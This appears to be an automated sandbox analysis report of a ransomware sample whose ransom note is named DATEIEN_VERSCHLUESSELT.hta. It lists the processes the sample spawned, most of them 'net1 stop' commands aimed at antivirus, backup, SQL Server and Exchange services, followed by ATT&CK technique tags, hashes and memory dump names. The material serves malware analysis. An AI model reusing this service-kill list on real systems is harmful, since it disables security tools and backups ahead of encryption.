C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
1⤵
PID:13284

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ESHASRV /y
1⤵
PID:13220

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
1⤵
PID:13212

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROD /y
1⤵
PID:13204

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
1⤵
PID:13196

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:13180

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
1⤵
PID:13132

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
1⤵
PID:13124

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EsgShKernel /y
1⤵
PID:13116

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SDRSVC /y
1⤵
PID:13108

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
1⤵
PID:13100

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
1⤵
PID:13092

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Agent” /y
1⤵
PID:12316

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
1⤵
PID:12308

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Enterprise Client Service” /y
1⤵
PID:10644

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer100 /y
1⤵
PID:12292

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EraserSvc11710 /y
1⤵
PID:10556

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBrokerSvc /y
1⤵
PID:13844

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ekrn /y
1⤵
PID:13516

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
1⤵
PID:13788

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
1⤵
PID:13772

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
1⤵
PID:13740

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop macmnsvc /y
1⤵
PID:13652

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “aphidmonitorservice” /y
1⤵
PID:13764

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPSecurityService /y
1⤵
PID:13620

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
1⤵
PID:13604

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Health Service” /y
1⤵
PID:13624

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPS /y
1⤵
PID:13612

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCatalogSvc /y
1⤵
PID:13636

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
1⤵
PID:13564

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Client” /y
1⤵
PID:13528

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA /y
1⤵
PID:13508

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
1⤵
PID:14076

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
1⤵
PID:14068

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
1⤵
PID:14060

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msexchangeimap4 /y
1⤵
PID:14052

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
1⤵
PID:14008

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
1⤵
PID:13992

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
1⤵
PID:13984

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
1⤵
PID:13976

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MMS /y
1⤵
PID:13968

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPS /y
1⤵
PID:13952

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop bedbg /y
1⤵
PID:13928

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
1⤵
PID:14780

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
1⤵
PID:14772

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DCAgent /y
1⤵
PID:13912

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPUpdateService /y
1⤵
PID:13644

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop W3Svc /y
1⤵
PID:13676

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
1⤵
PID:13588

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:13732

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
1⤵
PID:16488

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
1⤵
PID:16924

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
1⤵
PID:16900

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop audioendpointbuilder /y
1⤵
PID:16876

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
1⤵
PID:16280

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
1⤵
PID:16272

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
1⤵
PID:16072

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
1⤵
PID:16000

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mozyprobackup /y
1⤵
PID:13708

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msexchangeadtopology /y
1⤵
PID:13724

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
1⤵
PID:13716

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFS /y
1⤵
PID:13540

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
1⤵
PID:13580

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop masvc /y
1⤵
PID:13548

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
1⤵
PID:13556

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPS /y
1⤵
PID:13572

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ntrtscan /y
1⤵
PID:13476

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
1⤵
PID:13484

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeES /y
1⤵
PID:10596

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
1⤵
PID:11892

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer /y
1⤵
PID:11716

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMGMT /y
1⤵
PID:11708

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop POP3Svc /y
1⤵
PID:11700

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SMTPSvc /y
1⤵
PID:11692

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
1⤵
PID:16980

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
1⤵
PID:11684

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Clean Service” /y
1⤵
PID:11676

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
1⤵
PID:17216

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Desktop\DATEIEN_VERSCHLUESSELT.hta

MD5
ffdea704f658e489b910bb51a44228a5

SHA1
26feff5671ad48a913b384d616c77e54f9d99c63

SHA256
16002e5b27064f45523248784021d8859214c957b29e155e41b6eb9ba290d9d6

SHA512
206fb7a7f5f3d01c09f39035d1a1fd42835a08175d397bdd40e35112b63bc4960598b1aa310de8dba6fa0a47e680104b876719f3212b4d69831ea7bfd8970dff

Download Submit
memory/192-128-0x0000000000000000-mapping.dmp

Download
memory/364-146-0x0000000000000000-mapping.dmp

Download
memory/472-181-0x00000000064A0000-0x00000000064A1000-memory.dmp

Filesize
4KB

Download
memory/472-114-0x0000000000690000-0x0000000000691000-memory.dmp

Filesize
4KB

Download
memory/472-124-0x0000000004EB0000-0x0000000004EB1000-memory.dmp

Filesize
4KB

Download
memory/492-139-0x0000000000000000-mapping.dmp

Download
memory/508-136-0x0000000000000000-mapping.dmp

Download
memory/808-126-0x0000000000000000-mapping.dmp

Download
memory/988-122-0x0000000000000000-mapping.dmp

Download
memory/1152-135-0x0000000000000000-mapping.dmp

Download
memory/1300-134-0x0000000000000000-mapping.dmp

Download
memory/1972-132-0x0000000000000000-mapping.dmp

Download
memory/2040-144-0x0000000000000000-mapping.dmp

Download
memory/2204-123-0x0000000000000000-mapping.dmp

Download
memory/2364-138-0x0000000000000000-mapping.dmp

Download
memory/2376-129-0x0000000000000000-mapping.dmp

Download
memory/2648-127-0x0000000000000000-mapping.dmp

Download
memory/3164-121-0x0000000000000000-mapping.dmp

Download
memory/3264-143-0x0000000000000000-mapping.dmp

Download
memory/3668-133-0x0000000000000000-mapping.dmp

Download
memory/3692-125-0x0000000000000000-mapping.dmp

Download
memory/3696-137-0x0000000000000000-mapping.dmp

Download
memory/3708-131-0x0000000000000000-mapping.dmp

Download
memory/3736-120-0x0000000000000000-mapping.dmp

Download
memory/3748-179-0x0000000000000000-mapping.dmp

Download
memory/3756-142-0x0000000000000000-mapping.dmp

Download
memory/3808-141-0x0000000000000000-mapping.dmp

Download
memory/3820-130-0x0000000000000000-mapping.dmp

Download
memory/3828-117-0x0000000000000000-mapping.dmp

Download
memory/3832-140-0x0000000000000000-mapping.dmp

Download
memory/3844-116-0x0000000000000000-mapping.dmp

Download
memory/4012-145-0x0000000000000000-mapping.dmp

Download
memory/4020-119-0x0000000000000000-mapping.dmp

Download
memory/4024-118-0x0000000000000000-mapping.dmp

Download
memory/4120-147-0x0000000000000000-mapping.dmp

Download
memory/4128-178-0x0000000000000000-mapping.dmp

Download
memory/4144-148-0x0000000000000000-mapping.dmp

Download
memory/4176-149-0x0000000000000000-mapping.dmp

Download
memory/4200-150-0x0000000000000000-mapping.dmp

Download
memory/4212-151-0x0000000000000000-mapping.dmp

Download
memory/4248-152-0x0000000000000000-mapping.dmp

Download
memory/4296-153-0x0000000000000000-mapping.dmp

Download
memory/4316-154-0x0000000000000000-mapping.dmp

Download
memory/4340-155-0x0000000000000000-mapping.dmp

Download
memory/4348-180-0x0000000000000000-mapping.dmp

Download
memory/4352-156-0x0000000000000000-mapping.dmp

Download
memory/4476-157-0x0000000000000000-mapping.dmp

Download
memory/4512-158-0x0000000000000000-mapping.dmp

Download
memory/4564-159-0x0000000000000000-mapping.dmp

Download
memory/4580-160-0x0000000000000000-mapping.dmp

Download
memory/4592-161-0x0000000000000000-mapping.dmp

Download
memory/4624-163-0x0000000000000000-mapping.dmp

Download
memory/4632-162-0x0000000000000000-mapping.dmp

Download
memory/4672-164-0x0000000000000000-mapping.dmp

Download
memory/4752-165-0x0000000000000000-mapping.dmp

Download
memory/4768-166-0x0000000000000000-mapping.dmp

Download
memory/4800-167-0x0000000000000000-mapping.dmp

Download
memory/4828-168-0x0000000000000000-mapping.dmp

Download
memory/4872-169-0x0000000000000000-mapping.dmp

Download
memory/4900-170-0x0000000000000000-mapping.dmp

Download
memory/4936-171-0x0000000000000000-mapping.dmp

Download
memory/4948-172-0x0000000000000000-mapping.dmp

Download
memory/4992-173-0x0000000000000000-mapping.dmp

Download
memory/5008-174-0x0000000000000000-mapping.dmp

Download
memory/5020-175-0x0000000000000000-mapping.dmp

Download
memory/5068-176-0x0000000000000000-mapping.dmp

Download
memory/5116-177-0x0000000000000000-mapping.dmp

Download